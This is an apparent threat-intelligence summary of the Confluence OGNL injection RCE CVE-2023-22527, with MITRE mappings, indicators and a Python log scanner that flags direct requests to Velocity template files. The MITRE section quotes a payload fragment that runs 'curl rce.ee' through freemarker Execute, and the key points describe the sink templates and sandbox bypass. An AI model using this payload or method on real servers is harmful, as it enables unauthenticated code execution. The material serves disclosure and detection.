Atlassian Confluence – Remote Code Execution (CVE-2023-22527)

CVE-2023-22527 is a critical OGNL injection vulnerability in Atlassian Confluence Server and Data Center that can allow unauthenticated attackers to inject OGNL expressions and execute arbitrary code. Security researchers detail how unauthenticated access to Velocity template files enables remote code execution and note patches in newer Confluence versions, with detection templates released to help mitigate the issue. #CVE-2023-22527 #AtlassianConfluence #OGNLInjection #ConfluenceRCE #ProjectDiscovery #NucleiTemplate

Keypoints

  • CVE-2023-22527 is a critical vulnerability affecting Atlassian Confluence Server and Data Center that permits unauthenticated OGNL injection and remote code execution.
  • Attack surface includes rendering Velocity templates and directly accessing *.vm files, not just through standard application actions.
  • Researchers found OGNL sinks in template files (e.g., pagelist.vm, text-inline.vm) that pass parameters into OGNL expressions, enabling injection when parameters are crafted.
  • Exploitation involves reaching OGNL evaluation by bypassing Struts sandboxing, including using the OGNL library to call findValue via the OGNL tool.
  • Payloads demonstrated how to execute OS commands (e.g., via freemarker.template.utility.Execute) and bypass length restrictions with parameterized inputs.
  • A Nuclei detection template has been created to help identify CVE-2023-22527, contributed by the ProjectDiscovery community.
  • Patched versions (and guidance to update) mitigate the root cause; latest Confluence versions are not affected.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Unauthenticated attackers inject OGNL expressions into Confluence to enable code and command execution. Quote: ‘This vulnerability has the potential to permit unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution of arbitrary code and system commands.’
  • [T1059.004] Unix Shell – OGNL-based execution flows call OS commands via freemarker Execute, e.g., ‘… (new freemarker.template.utility.Execute()).exec({“curl rce.ee”})’ to run commands. Quote: ‘Next, we simply looked for any findValue calls… and to our surprise we found one in confluence/template/aui/text-inline.vm.’

Indicators of Compromise

  • [URL] context – http://localhost/template/aui/text-inline.vm, http://localhost/template/xhtml/pagelist.vm
  • [Domain] context – rce.ee
  • [File name] context – pagelist.vm, text-inline.vm
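Because the writeup identifies direct requests to Velocity template files (the two *.vm paths listed above) as the attack surface, a defender's first check is whether any client has requested such paths at all. The following is an added example, not code from the original post or from ProjectDiscovery's Nuclei template: it parses combined-format web-server access log lines, flags any request whose path ends in `.vm`, marks the two sink templates named in the writeup with higher confidence, and tallies hits per source address. The log lines are constructed for illustration and the IP addresses are documentation ranges, not real indicators.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [17/Jan/2024:10:12:01 +0000] "GET /template/aui/text-inline.vm?label=test HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.7 - - [17/Jan/2024:10:12:05 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.10 - - [17/Jan/2024:10:12:09 +0000] "POST /template/xhtml/pagelist.vm HTTP/1.1" 200 300 "-" "curl/8.0"
198.51.100.9 - - [17/Jan/2024:10:13:00 +0000] "GET /template/aui/text-inline.vm HTTP/1.1" 200 100 "-" "python-requests/2.31"
"""

# Minimal combined-log-format parser: source IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Template paths the writeup names as OGNL sinks reachable by direct request.
WATCHED_TEMPLATES = ("/template/aui/text-inline.vm", "/template/xhtml/pagelist.vm")


def parse_line(line):
    """Return a dict of log fields plus the URL path (query string removed), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = urlsplit(rec["target"]).path
    return rec


def is_direct_template_access(path):
    """Normal Confluence clients never request Velocity templates directly,
    so any path ending in .vm is treated as suspicious."""
    return path.endswith(".vm")


def scan_log(text):
    """Return every parsed request to a .vm file; 'known_sink' is True for the
    two template paths named in the writeup."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_direct_template_access(rec["path"]):
            continue
        rec["known_sink"] = rec["path"] in WATCHED_TEMPLATES
        hits.append(rec)
    return hits


def count_by_source(hits):
    """Tally flagged requests per source IP to surface the noisiest clients."""
    counts = {}
    for rec in hits:
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        tag = "KNOWN SINK" if rec["known_sink"] else "template"
        print(f"{rec['ts']} {rec['ip']} {rec['method']} {rec['path']} -> {tag}")
    print(count_by_source(scan_log(SAMPLE_LOG)))
```

The match is on the URL path only, with the query string stripped, so it does not depend on the shape of any particular payload; treat a hit as a reason to pull the full request and the server-side logs for that session, and confirm the instance is on a patched version as the writeup recommends.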

Read more: https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/